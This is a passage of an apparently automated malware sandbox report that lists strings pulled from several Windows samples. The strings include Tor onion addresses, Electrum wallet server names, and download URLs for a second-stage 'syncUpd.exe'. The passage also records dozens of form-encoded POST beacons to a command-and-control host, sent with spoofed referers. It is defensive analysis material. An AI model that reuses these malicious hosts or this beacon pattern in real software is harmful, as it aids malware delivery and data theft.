free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: S-1-5-21-2246122658-3693405117-2476756634-1003https://allstatsin.ruhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2246122658-3693405117-2476756634-1003
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ?-&52$1631313626321023042b113f2d26353224http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_VideoControllerS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7c:\users\user\appdata\local\temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe" C:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshTrustedInstallerSeDebugPrivilege
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                          Source: unknownDNS query: name: pastebin.com
                          Source: Malware configuration extractorURLs: http://host-file-host6.com/
                          Source: Malware configuration extractorURLs: http://host-host-file8.com/
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocyugmcp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmugk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpfwsaim.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kegnkcpidq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxqfgpms.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jgdfwhycbb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqxfcxtqc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxcdcfkj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlmfcqwlhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwlgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euufg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kxuoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vebudrviog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrrdwyfsj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://criwvjvtwq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwddotbdq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmobe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://swunoda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyicmpi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jbdwgxah.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hpfeeptar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydikox.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcunmavvat.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kibrkvnbk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rihjsppp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mogop.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebswgoa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hodjcq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vrhgpp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqetfsc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkucq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vngcolxw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://liedn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldxhifgucj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pemamjvcpk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcgvlxft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogmthh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nlijd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nugxs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-host-file8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fotbgladl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: host-host-file8.com
                          Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                          Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                          Source: Joe Sandbox ViewIP Address: 51.15.58.224 51.15.58.224
                          Source: Joe Sandbox ViewIP Address: 95.214.26.28 95.214.26.28
                          Source: Joe Sandbox ViewIP Address: 95.214.26.28 95.214.26.28
                          Source: global trafficTCP traffic: 192.168.2.6:49718 -> 51.15.58.224:14433
                          Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.7/scripts/plus.php?ip=
                          Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/?format=qqq/SILENTget1023
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.g
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
                          Source: Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://fontawesome.io
                          Source: Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://fontawesome.io/license/
                          Source: Broom.exe, 00000004.00000000.2108968497.00000000008CD000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://grub.org)Mozilla/5.0
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://invalidlog.txtlookup
                          Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWARE
                          Source: InstallSetup5.exe, 00000002.00000002.4569490884.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lazzarotata.icu/syncUpd.exedownload_quiet
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency
                          Source: InstallSetup5.exe, 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmp, InstallSetup5.exe, 00000002.00000000.2101641255.000000000040A000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: file.exe, 00000000.00000002.2167858508.0000000006C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0BA000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4581440051.000000000C0D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://vcr4vuv4sf5233btfy7xboez
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
